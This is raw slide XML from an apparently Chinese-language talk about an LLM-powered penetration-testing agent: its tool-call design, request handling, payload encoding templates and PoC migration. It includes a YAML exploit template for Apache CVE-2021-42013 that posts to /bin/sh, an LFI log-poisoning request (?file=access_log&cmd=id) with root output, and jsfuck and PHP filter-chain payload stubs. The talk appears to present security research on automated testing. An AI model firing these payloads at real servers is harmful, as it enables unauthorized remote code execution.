      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2880000" flipV="1">
            <a:off x="6063756" y="2468605"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8365490" y="4486275"/>
            <a:ext cx="540000" cy="540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整体</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流程演示</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检测</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 name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="323215" y="1250950"/>
            <a:ext cx="6021705" cy="2979420"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3771"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6529705" y="1236345"/>
            <a:ext cx="5499735" cy="5184140"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3074"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="322580" y="4406900"/>
            <a:ext cx="6022340" cy="1998980"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9307"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2880000" flipV="1">
            <a:off x="6193296" y="2902945"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10140000" flipV="1">
            <a:off x="6128526" y="5221965"/>
            <a:ext cx="540000" cy="540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654050" y="2748280"/>
            <a:ext cx="6870065" cy="1414780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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细节至上</a:t>
            </a:r>
            <a:endPar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ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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小镇做题家的</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生存智慧</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1040765" y="1699260"/>
            <a:ext cx="6096000" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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381635" y="167640"/>
            <a:ext cx="2915285" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3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About me</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3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8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6942455" y="1731645"/>
            <a:ext cx="3821430" cy="380111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腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>照片位</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1830070" y="2565400"/>
            <a:ext cx="4265930" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:sp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西安交通大学网络空间</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安全学院博士生</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研究领域：开源漏洞治理、AI赋能安全、高级威胁狩猎</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主导的多项大模型+网络安全研究工作发表于ASE、S&amp;P等国际顶级会议。</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多年攻防与</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CTF</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赛事经验</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连续四年教育部攻防演练第一名</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，2025</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年国家护网攻击队主力成员</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持续的AI+应用开发者，开发的多项大模型+安全产品投入企业落地场景，积极探索AI</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endParaRPr>
          </a:p>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+网络安全的工业化经验。</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1830070" y="1779270"/>
            <a:ext cx="4064000" cy="553085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3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胡宇睿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3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xjtuHunter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3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 name="图片 1" descr="b09f7a9ed2452c54c8170ac3498b54d7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6942455" y="1731645"/>
            <a:ext cx="4012565" cy="38011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工具</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调用优化</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="1129665"/>
            <a:ext cx="13335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设计规范</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 name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="2520950"/>
            <a:ext cx="13335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网络请求</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5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="3791585"/>
            <a:ext cx="13335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代码</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执行</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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="5285740"/>
            <a:ext cx="13335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编码</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封装</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9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675130" y="1032510"/>
            <a:ext cx="6848475" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>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1）</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工具调用采用</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XML</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格式，特殊字符通过</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!CDATA</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嵌入</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2）</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错误格式化数据允许重复对话生成</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1675130" y="2399665"/>
            <a:ext cx="8867775" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>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1）</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采用</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urllib</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底层库，避免直接编码路径</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参数字符</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2）</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对</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301/302</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等跳转，保存所有历史状态以供比对</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对大体积响应包</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提取</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漏洞利用响应</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与</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正常请求</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的差异部分投喂给大模型</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1" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675130" y="3730625"/>
            <a:ext cx="6848475" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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采用</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Python</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沙盒执行代码，应对复杂计算、逻辑处理等需求</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2" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675130" y="5194300"/>
            <a:ext cx="8082280" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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对</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unhex</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jsfuck</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等复杂编码，采用模板语法封装</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大模型只需生成简单字符</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逻辑</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3" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1674495" y="5859145"/>
            <a:ext cx="2216150" cy="401368"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="ctr" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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{{jsfuck(‘alert(1)’)}}</a:t>
            </a:r>
            <a:endPar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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4010025" y="5859145"/>
            <a:ext cx="2216150" cy="401110"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="ctr" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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{{unhex(‘</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ffd8ffe0</a:t>
            </a:r>
            <a:r>
              <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6" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9133205" y="2460625"/>
            <a:ext cx="2309495" cy="325813"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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?file=access_log&amp;cmd=id</a:t>
            </a:r>
            <a:endPar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7" name="文本框 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9133205" y="2955925"/>
            <a:ext cx="2309495" cy="1199515"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6641"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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200 GET /index.php xxxx</a:t>
            </a:r>
            <a:endPar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10000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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404 GET /xx</a:t>
            </a:r>
            <a:endPar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10000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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1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uid=0(root) gid=0(wheel) groups=0(wheel)</a:t>
            </a:r>
            <a:endPar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8" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9211945" y="3645535"/>
            <a:ext cx="2055495" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6641"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="ctr" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:endPar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9" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6346190" y="5853430"/>
            <a:ext cx="2736215" cy="401110"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="ctr" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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{{php_filter_chain(‘</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0" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1715135" y="4300855"/>
            <a:ext cx="4901565" cy="783590"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15539"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="11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&lt;tool&gt; </a:t>
            </a:r>
            <a:endPar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457200" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="11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&lt;code&gt;&lt;![CDATA[</a:t>
            </a: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需要测试的</a:t>
            </a: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python</a:t>
            </a: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代码</a:t>
            </a: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]]&gt;&lt;/code&gt;</a:t>
            </a:r>
            <a:endPar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1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&lt;/tool&gt;</a:t>
            </a:r>
            <a:endPar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2" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763395" y="1954530"/>
            <a:ext cx="995045" cy="397510"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15539"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="ctr" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="11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xml</a:t>
            </a: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字符串</a:t>
            </a:r>
            <a:endPar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3" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3959225" y="1954530"/>
            <a:ext cx="1115695" cy="397510"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15539"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="ctr" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="11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dict</a:t>
            </a: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格式参数</a:t>
            </a:r>
            <a:endPar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4" name="文本框 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6173470" y="1954530"/>
            <a:ext cx="1115695" cy="397510"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15539"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="ctr" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pP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工具</a:t>
            </a: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执行</a:t>
            </a:r>
            <a:endPar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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="直接箭头连接符 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2902585" y="2153285"/>
            <a:ext cx="894715" cy="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nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5182870" y="2159635"/>
            <a:ext cx="894715" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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2844165" y="1882775"/>
            <a:ext cx="1115060" cy="275590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10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xmltodict</a:t>
            </a:r>
            <a:endPar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9" name="文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5111750" y="1889125"/>
            <a:ext cx="1115060" cy="275590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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反射</a:t>
            </a:r>
            <a:r>
              <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调用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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POC</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迁移与</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后利用</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 name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="1009650"/>
            <a:ext cx="6772275" cy="3401145"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3920"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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name: "Apache HTTP Server 2.4.50 RCE (CVE-2021-42013)"</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description: "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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利用</a:t>
            </a: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Apache HTTP Server 2.4.50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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的路径规范化缺陷，攻击者通过构造恶意请求绕过访问限制，在受影响服务器上执行任意系统命令，可导致服务器完全被控制、敏感数据泄露或服务不可用。</a:t>
            </a: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severity: "critical"</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references:</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"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013"</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requests:</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steps:</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method: "POST"</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path: "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"</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headers:</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User-Agent: "Mozilla/5.0"</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Content-Type: "application/x-www-form-urlencoded"</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body: "echo; echo 'VULN_TEST'"</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matchers:</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type: "word"</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words: ["VULN_TEST"]</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condition: "and"</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 type: "status"</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status: [200]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1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6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="4639310"/>
            <a:ext cx="6771640" cy="1759585"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8346"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7343775" y="1607185"/>
            <a:ext cx="4655185" cy="4791710"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2632"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3201035" y="4256405"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="18720000">
            <a:off x="7064516" y="4981935"/>
            <a:ext cx="540000" cy="540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常态化题海战术</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 name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
